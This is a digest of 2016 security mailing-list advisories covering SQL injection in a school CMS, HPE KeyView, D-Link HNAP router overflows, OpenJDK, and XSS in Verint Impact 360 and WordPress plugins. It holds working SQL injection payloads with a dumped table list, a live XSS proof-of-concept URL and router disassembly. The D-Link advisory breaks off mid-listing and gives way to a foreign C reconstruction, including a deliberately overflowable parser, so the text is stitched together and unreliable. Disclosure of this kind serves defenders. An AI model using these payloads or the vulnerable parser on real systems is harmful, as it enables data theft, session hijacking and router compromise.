Payload: kelas=-2062' UNION ALL SELECT 
NULL,CONCAT(0x71736b6271,0x43746d4846536767524d,0x716b6d6171),NULL#

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: kelas=1' AND SLEEP(5) AND 'Wqrd'='Wqrd
---
[21 tables]
+-----------------+
| sh_agenda       |
| sh_album        |
| sh_berita       |
| sh_buku_tamu    |
| sh_galeri       |
| sh_guru_staff   |
| sh_info_sekolah |
| sh_jabatan      |
| sh_kategori     |
| sh_kelas        |
| sh_komentar     |
| sh_mapel        |
| sh_materi       |
| sh_pengaturan   |
| sh_pengumuman   |
| sh_psb          |
| sh_sidebar      |
| sh_siswa        |
| sh_statistik    |
| sh_tema         |
| sh_users        |
+-----------------+


Solution - Fix & Patch:
===
The sql-injection vulnerability in the `kelas` parameter of the `index.php` 
file POST method request can be patched by usage of a secure 
prepared statement. Parse the parameter and encode the values to a secure 
format to prevent further 
sql-injection attacks. Escape the parameter and disallow usage of special chars.


Security Risk:
==
The security risk of the remote sql-injection web vulnerability in the 
schoolhos content management system is estimated as high. (CVSS 6.7)


Credits & Authors:
==
Vulnerability Laboratory [Research Team] - Lawrence Amer 
(www.vulnerability-lab.com/show.php?user=Lawrence Amer)


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a 
particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incident

[security bulletin] HPSBGN03643 rev.1 - HPE KeyView using Filter SDK, Remote Code Execution

2016-11-08 Thread security-alert
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Note: the current version of the following document is available here:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05325836

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c05325836
Version: 1

HPSBGN03643 rev.1 -  HPE KeyView using Filter SDK, Remote Code Execution

NOTICE: The information in this Security Bulletin should be acted upon as
soon as possible.

Release Date: 2016-11-04
Last Updated: 2016-11-04

Potential Security Impact: Remote: Code Execution

Source: Hewlett Packard Enterprise, Product Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified in the Filter SDK
component of HPE KeyView. These vulnerabilities could be exploited remotely
to allow code execution.

References:

  - CVE-2016-4402 - Buffer Overflow
  - CVE-2016-4403 - Memory Corruption
  - CVE-2016-4404 - Memory Allocation issue
  - PSRT110140

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.

  - HPE KeyView v10.25 and earlier  - Keyview Filter SDK

BACKGROUND

  CVSS Base Metrics
  =
  Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector

CVE-2016-4402
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
  4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)

CVE-2016-4403
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
  4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)

CVE-2016-4404
  5.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
  4.3 (AV:N/AC:M/Au:N/C:P/I:N/A:N)

Information on CVSS is documented in
HPE Customer Notice HPSN-2008-002 here:

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499

Hewlett Packard Enterprise thanks Andrew Brooks of Imanage.com for reporting
these vulnerabilities to security-al...@hpe.com

RESOLUTION

HPE has made the following updates available to resolve the vulnerabilities
in the impacted versions of HPE KeyView.

Please install HPE KeyView v11.2 from the following location:


HISTORY
Version:1 (rev.1) - 4 November 2016 Initial release

Third Party Security Patches: Third party security patches that are to be
installed on systems running Hewlett Packard Enterprise (HPE) software
products should be applied in accordance with the customer's patch management
policy.

Support: For issues about implementing the recommendations of this Security
Bulletin, contact normal HPE Services support channel. For other issues about
the content of this Security Bulletin, send e-mail to security-al...@hpe.com.

Report: To report a potential security vulnerability for any HPE supported
product:
  Web form: https://www.hpe.com/info/report-security-vulnerability
  Email: security-al...@hpe.com

Subscribe: To initiate a subscription to receive future HPE Security Bulletin
alerts via Email: http://www.hpe.com/support/Subscriber_Choice

Security Bulletin Archive: A list of recently released Security Bulletins is
available here: http://www.hpe.com/support/Security_Bulletin_Archive

Software Product Category: The Software Product Category is represented in
the title by the two characters following HPSB.

3C = 3COM
3P = 3rd Party Software
GN = HPE General Software
HF = HPE Hardware and Firmware
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PV = ProCurve
ST = Storage Software
UX = HP-UX

Copyright 2016 Hewlett Packard Enterprise

Hewlett Packard Enterprise shall not be liable for technical or editorial
errors or omissions contained herein. The information provided is provided
"as is" without warranty of any kind. To the extent permitted by law, neither
HP or its affiliates, subcontractors or suppliers will be liable for
incidental, special or consequential damages including downtime cost; lost
profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice. Hewlett
Packard Enterprise and the names of Hewlett Packard Enterprise products
referenced herein are trademarks of Hewlett Packard Enterprise in the United
States and other countries. Other product and company names mentioned herein
may be trademarks of their respective owners.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQEcBAEBCAAGBQJYHO7wAAoJELXhAxt7SZai+EIIAL1g5NIsNtmRdeYoCJtrOylt
FUvo4toRNpUE8LNw6zhRxkucYlaW91nOQjTBudUUxY44TAOSzieW4dtn4B897CHQ
1cJHplKSqerRbE4Q+K5fiPCF7l3jq1Hz9Fp+QIaqUiYqoojgyR3IBYt5pXZYJuI/
QLSPeD3QK7nMLjxoX5OCjsNauNxz+QQmkSuTXXLVh9ajVZ2nOu3esnLpqZbqEpkh
sDULiVLUHwBOAxhUX/WEuyYAkwwK9Qi8MjTktIlQx2m6k8kNJmk99qnYaE88bQb7
YPQLWx6rJoGD+9YmoGtcOsstDU6Qomd7kbT8Rkb/rxfsY8+TNhZzrcIve7CH9uQ=
=uHsu
-END PGP SIGNATURE-


[CVE-2016-6563 / VU#677427]: Dlink DIR routers HNAP Login stack buffer overflow

2016-11-08 Thread Pedro Ribeiro
tl;dr

A stack bof in several Dlink routers, which can be exploited by an
unauthenticated attacker in the LAN. There is no patch as Dlink did not
respond to CERT's requests. As usual, a Metasploit module is in the
queue (see [9] below) and should hopefully be integrated soon.

The interesting thing about this vulnerability is that it affects both
ARM and MIPS devices, so exploitation is slightly different for each type.

Link to CERT's advisory:
https://www.kb.cert.org/vuls/id/677427

Link to a copy of the advisory pasted below:
https://raw.githubusercontent.com/pedrib/PoC/master/advisories/dlink-hnap-login.txt

Have fun.

Regards,
Pedro

>> Multiple vulnerabilities in Dlink DIR routers HNAP Login function
(multiple routers affected)
>> Discovered by Pedro Ribeiro (ped...@gmail.com), Agile Information
Security
==
Disclosure: 07/11/2016 / Last updated: 07/11/2016

>> Background on the affected products:
"Smartphones, laptops, tablets, phones, Smart TVs, game consoles and
more – all being connected at the same time. That’s why we created the
new AC3200 Ultra Wi-Fi Router. With Tri-Band Technology and speeds up to
3.2Gbps, it delivers the necessary ultra-performance to power even the
most demanding connected homes, making it the best wireless home router
for gaming."


>> Summary:
Dlink routers expose a protocol called HNAP (Home Network Administration
Protocol) on the LAN interface. This is a SOAP protocol that allows
identification, configuration, and management of network devices. It
seems Dlink uses an implementation of this protocol to communicate with
the router's web interface over the LAN. For more information regarding
HNAP, see [1] and [2].

Dlink has a long history of vulnerabilities in HNAP. Craig Heffner in
particular seems to have found a lot of them (see [3], [4], [5], [6],
[7], [8]).

This new vulnerability occurs in the processing of XML tags inside SOAP
messages when performing the HNAP Login action. The affected function
contains two subsequent stack overflows, which can be exploited by an
unauthenticated attacker on the LAN. It affects a number of Dlink
routers which span the ARM and MIPS architectures. A Metasploit module
that exploits this vulnerability for both architectures has been
released [9].

A special thanks to CERT/CC and Trent Novelly for help with disclosing
this vulnerability to the vendor. Please refer to CERT's advisory for
more details [10].


>> Technical details:
Vulnerability: Stack buffer overflow
CVE-2016-6563
Attack Vector: Remote
Constraints: Can be exploited by an unauthenticated attacker. See below
for other constraints.
Affected versions:
  The following MIPS devices have been confirmed to be vulnerable:
DIR-823
DIR-822
DIR-818L(W)

  The following ARM devices have been confirmed to be vulnerable:
DIR-895L
DIR-890L
DIR-885L
DIR-880L
DIR-868L -> Rev. B and C only

  There might be other affected devices which are not listed above.

---
Vulnerability details and MIPS exploitation
---

The vulnerable function, parse_xml_value (my name, not a symbol), is
called from hnap_main (a symbol in the binary) in /htdocs/cgibin.
This function takes 3 arguments: the first is the request object /
string, the second is the XML tag name to be parsed inside the request,
and the third is a pointer to where the value of that tag should be
returned.

The function tries to find the tag name inside the request object and
then extracts the tag value, copying it first to a local variable and
then to the third argument. This function is called from hnap_main when
performing the HNAP Login action to obtain the values of Action,
Username, LoginPassword and Captcha from the SOAP request shown above.

parse_xml_value(char* request, char* XMLtag, char* tag_value)
(...)
.text:00412264 xml_tag_value_start = $s2
.text:00412264 xml_tag_value_end = $s1
.text:00412264 C30 addu    xml_tag_value_start, $v0, $s0  # s2 now points to $value
.text:00412268 C30 la      $t9, strstr
.text:0041226C C30 move    $a1, xml_tag_value_end  # needle
.text:00412270 C30 jalr    $t9 ; strstr
.text:00412274 C30 move    $a0, xml_tag_value_start  # haystack
.text:00412278 C30 lw      $gp, 0xC30+var_C20($sp)
.text:0041227C C30 beqz    $v0, loc_4122BC
.text:00412280 C30 subu    xml_tag_value_end, $v0, xml_tag_value_start  # s1 now holds the ptr to value$
.text:00412284 C30 bltz    xml_tag_value_end, loc_4122BC
.text:00412288 C30 addiu   $s0, $sp, 0xC30+xml_tag_var
.text:0041228C C30 la      $t9, strncpy
.text:00412290 C30 move    $a2, xml_tag_value_end  # n
.text:00412294 C30 move    $a1, xml_tag_value_start  # src
.text:00412298 C30 addu    xml_tag_value_
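The extraction sequence in the listing above (strstr for the tag, length = end - start, strncpy with that length into a local buffer) reconstructed in C as an added example beside a bounded rewrite of the same step. This is not code from the advisory, the Metasploit module or the D-Link firmware; the 64-byte buffer size, the function names, the namespace in the sample body and the sample Login request itself are assumptions made for illustration. The only length check the listing performs is the bltz (length below zero), so the bounded version adds the upper bound that is missing, and a request-level check shows where a front end could reject oversized values before the parser sees them.

```c
/* Added example, not code from the advisory or the D-Link firmware: a C
 * reconstruction of the tag-value extraction the MIPS listing describes
 * (strstr for the tag, length = end - start, strncpy with that length),
 * beside a bounded version that rejects oversized values before copying.
 * VALUE_BUF, the function names and the sample Login body are assumptions. */
#include <stdio.h>
#include <string.h>

#define VALUE_BUF 64      /* assumed size of the local value buffer */
#define TAG_BUF   32      /* room for "</" + tag name + ">" + NUL */

/* Build "<tag>" and "</tag>"; returns 0 if the tag name does not fit. */
static int build_tags(const char *tag, char *open_tag, char *close_tag)
{
    if (strlen(tag) + 4 > TAG_BUF)
        return 0;
    snprintf(open_tag, TAG_BUF, "<%s>", tag);
    snprintf(close_tag, TAG_BUF, "</%s>", tag);
    return 1;
}

/* Mirrors the listing: the only check on the computed length is the bltz
 * (length < 0), so the n handed to strncpy comes straight from the request
 * and a value longer than VALUE_BUF runs past `local` on the stack. Kept
 * only for contrast with the bounded version; never feed it untrusted input. */
int parse_xml_value_unbounded(const char *request, const char *tag, char *tag_value)
{
    char open_tag[TAG_BUF], close_tag[TAG_BUF];
    char local[VALUE_BUF];

    if (!build_tags(tag, open_tag, close_tag))
        return -1;
    const char *start = strstr(request, open_tag);       /* s2: start of value */
    if (!start)
        return -1;
    start += strlen(open_tag);
    const char *end = strstr(start, close_tag);          /* v0: closing tag */
    if (!end)
        return -1;
    long len = end - start;                              /* s1 = v0 - s2 */
    if (len < 0)                                         /* the bltz check */
        return -1;
    strncpy(local, start, (size_t)len);                  /* first overflow: n unbounded */
    local[len] = '\0';
    strcpy(tag_value, local);                            /* second copy, also unbounded */
    return (int)len;
}

/* Bounded version: the length is compared with the destination size before
 * a single byte is copied, and the output is always NUL-terminated.
 * Returns the value length, -1 if the tag is absent, -2 if the value is too long. */
int parse_xml_value_bounded(const char *request, const char *tag,
                            char *tag_value, size_t tag_value_len)
{
    char open_tag[TAG_BUF], close_tag[TAG_BUF];

    if (!build_tags(tag, open_tag, close_tag))
        return -1;
    const char *start = strstr(request, open_tag);
    if (!start)
        return -1;
    start += strlen(open_tag);
    const char *end = strstr(start, close_tag);
    if (!end)
        return -1;
    size_t len = (size_t)(end - start);
    if (tag_value_len == 0 || len >= tag_value_len)
        return -2;                                       /* reject, do not truncate silently */
    memcpy(tag_value, start, len);
    tag_value[len] = '\0';
    return (int)len;
}

/* Constructed sample HNAP Login body carrying the four tags the advisory names. */
const char SAMPLE_LOGIN[] =
    "<Login xmlns=\"http://purenetworks.com/HNAP1/\">"
    "<Action>request</Action>"
    "<Username>Admin</Username>"
    "<LoginPassword></LoginPassword>"
    "<Captcha></Captcha>"
    "</Login>";

/* Request-level check a front end could run before calling the parser:
 * 1 if all four Login fields are present and fit in VALUE_BUF, else 0. */
int login_request_is_sane(const char *request)
{
    static const char *const tags[] = {"Action", "Username", "LoginPassword", "Captcha"};
    char value[VALUE_BUF];
    for (size_t i = 0; i < sizeof tags / sizeof tags[0]; i++)
        if (parse_xml_value_bounded(request, tags[i], value, sizeof value) < 0)
            return 0;
    return 1;
}

int main(void)
{
    char value[VALUE_BUF];
    int n = parse_xml_value_bounded(SAMPLE_LOGIN, "Username", value, sizeof value);
    printf("Username -> %d bytes: \"%s\"\n", n, value);
    printf("sample Login request sane: %d\n", login_request_is_sane(SAMPLE_LOGIN));
    return 0;
}
```

The bounded parser returns a distinct error (-2) rather than truncating, so the caller can log and drop the request instead of proceeding with a silently shortened credential; an empty tag such as `<Captcha></Captcha>` yields length 0, which is valid and not an error.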

[SECURITY] [DSA 3707-1] openjdk-7 security update

2016-11-08 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

- -
Debian Security Advisory DSA-3707-1   secur...@debian.org
https://www.debian.org/security/   Moritz Muehlenhoff
November 07, 2016 https://www.debian.org/security/faq
- -

Package: openjdk-7
CVE ID : CVE-2016-5542 CVE-2016-5554 CVE-2016-5573 CVE-2016-5582
 CVE-2016-5597

Several vulnerabilities have been discovered in OpenJDK, an
implementation of the Oracle Java platform, resulting in breakouts
of the Java sandbox or denial of service.

For the stable distribution (jessie), this problem has been fixed in
version 7u111-2.6.7-2~deb8u1.

We recommend that you upgrade your openjdk-7 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
=gGs3
-END PGP SIGNATURE-



Cross Site Scripting Vulnerability In Verint Impact 360

2016-11-08 Thread sanehsingh
Overview


* Title : Cross Site Scripting Vulnerability In Verint Impact 360
* Author: Sanehdeep Singh
* Plugin Homepage: http://www.verint.com 
* Severity: Medium
* Version Affected: 11.1
* Version patched: Patches available. Contact Vendor

Description 
===

About the Product
=
Verint Impact 360 is an enterprise-wide application for quality monitoring/call 
recording, workforce management, performance management, and eLearning that helps 
optimize business operations, customer relationships, and personnel. 

Vulnerable Parameter 


Send Message > Select Employee >

requiredPrivilegeIDs= XSS Payload

About Vulnerability
---
The Verint Impact 360 application is vulnerable to a Cross Site Scripting 
vulnerability which allows an attacker to perform phishing or session 
hijacking attacks. Attackers can redirect the user to a fake page to obtain 
usernames and passwords, or inject scripts to steal cookies, which can lead to 
session hijacking attacks.

Vulnerability Class
=== 
Cross Site Scripting 
(https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS))

#Live Poc URL
https://xxx/wfo/control/emp_selector_pu?selectorName=Employee_GN31&isRefreshOpenerOnClose=false&isMultiSelectEnabled=true&userRequired=false&isShowActiveEmployeesOnly=true&requiredPrivilegeIDs=alert("XSS")

Mitigation 
==
Contact Verint team for Mitigation.

Disclosure 
==
29-August-2016 Reported to Verint Team
 
Credits
===
* Sanehdeep  Singh 
* Senior Consultant
* ControlCase International Pvt Ltd. 


Cross-Site Scripting vulnerability in Quotes Collection WordPress Plugin

2016-11-08 Thread Summer of Pwnage


Cross-Site Scripting vulnerability in Quotes Collection WordPress Plugin

Yorick Koster, July 2016


Abstract

A Cross-Site Scripting vulnerability was found in the Quotes Collection
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.


OVE ID

OVE-20160712-0015


See also

https://www.pluginvulnerabilities.com/2016/09/13/reflected-cross-site-scripting-xss-vulnerability-in-quotes-collection/


Tested versions

This issue was successfully tested on Quotes Collection WordPress Plugin
version 2.0.5.


Fix

There is currently no fix available.


Details

https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_quotes_collection_wordpress_plugin.html


Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.


Persistent Cross-Site Scripting in WassUp Real Time Analytics WordPress Plugin

2016-11-08 Thread Summer of Pwnage


Persistent Cross-Site Scripting in WassUp Real Time Analytics WordPress
Plugin

Burak Kelebek, October 2016


Abstract

A stored Cross-Site Scripting (XSS) vulnerability has been found in the
WassUp Real Time Analytics WordPress Plugin. By using this vulnerability
an attacker can inject malicious JavaScript code into the application,
which will execute within the browser of any user who views the Activity
Log, in general WP admin.


OVE ID

OVE-20160717-0002


Tested versions

This issue was successfully tested on WassUp Real Time Analytics version
1.9.


Fix

This issue has been fixed in version 1.9.1.


Details

https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_wassup_real_time_analytics_wordpress_plugin.html


Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.


Cross-Site Scripting in Calendar WordPress Plugin

2016-11-08 Thread Summer of Pwnage


Cross-Site Scripting in Calendar WordPress Plugin

Remco Vermeulen, July 2016


Abstract

A Cross-Site Scripting vulnerability was found in the Calendar WordPress
Plugin. This issue allows an attacker to perform a wide variety of
actions, such as stealing Administrators' session tokens, or performing
arbitrary actions on their behalf. In order to exploit this issue, the
attacker has to lure/force a logged on WordPress Administrator into
opening a malicious website.


OVE ID

OVE-20160725-0008


Tested versions

This issue was successfully tested on Calendar WordPress Plugin version
1.3.7.


Fix

This issue is resolved in Calendar version 1.3.8.


Details

https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_calendar_wordpress_plugin.html


Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.